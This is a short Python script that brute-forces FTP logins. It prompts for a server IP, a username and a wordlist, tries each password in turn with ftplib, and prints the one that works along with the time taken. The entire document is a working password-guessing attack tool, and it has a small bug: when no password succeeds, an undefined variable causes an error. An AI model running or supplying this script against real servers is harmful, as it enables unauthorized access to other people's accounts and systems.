#! /usr/bin/python3
import ftplib
import time 
import datetime

server =input('give server ip')
user=input('give username')
passwordlist=input('enter the path of the wordlist:')
time_started=time.time()
try:
    with open(passwordlist,'r')as pw:
        for word in pw:
            word=word.strip('\r').strip('\n')
            try:
                ftp=ftplib.FTP(server)
                ftp.login(user,word)
                print('success the password is ' + word)
                a=True
                break
            except:
                print('still trying')
except:
   print('wordlist error')        
if a==True:
    time_lasted=datetime.timedelta(seconds=time.time()-time_started)
    print('total time to find the password:',time_lasted)
